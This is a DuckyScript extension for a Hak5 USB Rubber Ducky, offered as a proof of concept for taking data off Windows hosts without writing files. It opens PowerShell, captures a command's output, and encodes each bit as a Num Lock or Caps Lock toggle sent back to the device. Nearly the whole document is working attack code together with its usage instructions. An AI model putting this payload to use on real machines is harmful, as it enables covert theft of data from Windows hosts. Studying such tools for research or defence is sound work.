EXTENSION WINDOWS_FILELESS_HID_EXFIL
    REM VERSION 1.0
    REM AUTHOR: 0i41E

    REM_BLOCK DOCUMENTATION
        Extension for Keystroke Reflection data exfiltration without putting files on disk.
        This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.

        TARGET:
            Windows Hosts that supports powershell and SendKeys

        USAGE:
            Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
            It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.

        Example Usage:
            GUI r
            DELAY 500
            STRINGLN powershell
            DELAY 1000
            STRING echo "This is my test"
            Windows_Fileless_HID_Exfil()
    END_REM

    FUNCTION Windows_Fileless_HID_Exfil()
        DELAY 250
        REM Saving current Keyboard lock keys
        SAVE_HOST_KEYBOARD_LOCK_STATE
        $_EXFIL_MODE_ENABLED = TRUE
        $_EXFIL_LEDS_ENABLED = TRUE
        DELAY 500
        REM Setting the output as variable
        STRING |Out-String|Set-Variable -Name "DD";
        REM Converting output into Lock Key values
        STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
        REM Exfiltrating via Keystroke Reflection
        STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
        REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
        WAIT_FOR_SCROLL_CHANGE
        LED_G
        $_EXFIL_MODE_ENABLED = FALSE
        RESTORE_HOST_KEYBOARD_LOCK_STATE
    END_FUNCTION
END_EXTENSION